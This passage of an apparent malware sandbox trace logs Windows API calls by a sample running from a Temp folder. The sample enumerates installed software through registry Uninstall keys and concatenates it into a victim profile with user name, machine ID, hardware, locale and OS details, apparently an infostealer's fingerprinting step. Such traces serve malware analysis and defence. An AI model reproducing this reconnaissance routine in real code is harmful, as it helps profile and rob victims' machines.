14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\n" [0175.942] RegCloseKey (hKey=0x354) returned 0x0 [0175.942] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x32, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-0117-0409-0000-0000000FF1CE}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.942] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-0117-0409-0000-0000000FF1CE}") returned 90 [0175.942] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-0117-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.942] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft Access Setup Metadata MUI (English) 2016", lpcbData=0x197fd4*=0x33) returned 0x0 [0175.942] lstrlenA (lpString="Microsoft Access Setup Metadata MUI (English) 2016") returned 50 [0175.942] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\n", lpString2="Microsoft Access Setup Metadata MUI (English) 2016" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016" [0175.942] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="16.0.4266.1001", lpcbData=0x197fd4*=0xf) returned 0x0 [0175.943] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 " [0175.943] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 ", lpString2="16.0.4266.1001" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft 